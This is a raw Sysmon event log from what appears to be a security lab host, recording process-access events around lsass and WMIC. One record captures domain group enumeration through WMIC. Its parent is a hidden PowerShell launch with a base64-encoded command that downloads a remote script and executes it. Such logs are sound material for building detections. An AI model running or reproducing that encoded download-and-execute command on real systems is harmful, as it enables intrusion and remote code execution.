21:58:47.918{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.902{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.902{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.887{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+102c6|C:\Windows\system32\wbem\wbemcore.dll+d267|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+89d4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000035128506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.887{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.856{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.856{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.852{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.852{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.852{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.834{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.834{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.771{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.771{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.771{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.771{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.771{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.756{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.756{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.756{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.756{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.756{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.770{B81B27B7-8397-613A-DB96-03000000C801}5552C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountnameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035128487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 